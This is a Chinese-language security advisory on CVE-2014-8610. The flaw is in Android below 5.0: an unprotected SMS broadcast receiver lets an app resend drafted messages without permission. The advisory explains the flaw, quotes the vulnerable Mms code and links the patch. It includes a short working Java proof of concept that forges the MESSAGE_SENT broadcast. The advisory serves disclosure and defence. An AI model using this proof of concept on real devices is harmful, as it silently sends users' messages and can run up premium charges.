CVE-2014-8610 Android < 5.0 短信重发漏洞 (WOOYUN)

  • A+
所属分类:WooYun-Zone

瘦蛟舞CVE-2014-8610 Android < 5.0 短信重发漏洞 (WOOYUN) (科普是一种公益行为) CVE-2014-8610 Android < 5.0 短信重发漏洞 (WOOYUN) | 2014-11-26 16:01

###影响版本:

android<5.0

###ID

CVE-2014-8610
Android id 17671795

###危害

重发短信恶意扣费
通过伪造草稿箱短信,可以达到无权限发送任意短信的效果

###原理

典型的广播接收器组件泄露加上广播伪造利用。

漏洞存在文件:https://android.googlesource.com/platform/packages/apps/Mms/+/android-4.4.4_r2.0.1/src/com/android/mms/transaction/SmsReceiverService.java

漏洞存在组件:.transaction.SmsReceiver

伪造恶意广播`com.android.mms.transaction.MESSAGE_SENT`会回调方法`handleSmsSent`。恶意应用将伪造广播的resultcode设置为RESULT_ERROR_RADIO_OFF将会进入下述代码逻辑,URI中的SMS将会移动到短信发送队列,然后你草稿箱的短信就被不知不觉的发送啦

关键代码:

private void handleSmsSent(Intent intent, int error) {
         ...
         } else if ((mResultCode == SmsManager.RESULT_ERROR_RADIO_OFF) || (mResultCode == SmsManager.RESULT_ERROR_NO_SERVICE)) {
                   if (Log.isLoggable(LogTag.TRANSACTION, Log.VERBOSE)) {
                            Log.v(TAG, "handleSmsSent: no service, queuingmessage w/ uri: " + uri);
                   }
                   // We got an error with no service or no radio. Register for state changes so
                   // when the status of the connection/radio changes, we can try to send the
                   // queued up messages.
                   registerForServiceStateChanges();
                   // We couldn't send the message, put in the queue to retry later.
                   Sms.moveMessageToFolder(this, uri, Sms.MESSAGE_TYPE_QUEUED, error);

###POC

Intent intent= new Intent("com.android.mms.transaction.MESSAGE_SENT");
    intent.setData(Uri.parse("content://sms"));
    intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiver");
    sendOrderedBroadcast(intent,null,null,null,SmsManager.RESULT_ERROR_RADIO_OFF,null,null);

  /**
  Some tips about the POC:
  1. uri is content://sms without specifying the ID, that means all the SMS will be resent.
  2. must use explicit intent
  3. with this version of sendOrderedBroadcast, the initial result code can be controlled
  **/

###修复

将广播接收器.transaction.SmsReceiver加上了android.permission.SEND_SMS权限要求。

<receiver android:name=".transaction.SmsReceiver" android:permission="android.permission.SEND_SMS">

https://android.googlesource.com/platform/packages/apps/Mms/+/008d6202fca4002a7dfe333f22377faa73585c67

原文:http://xteam.baidu.com/?p=164

分享到: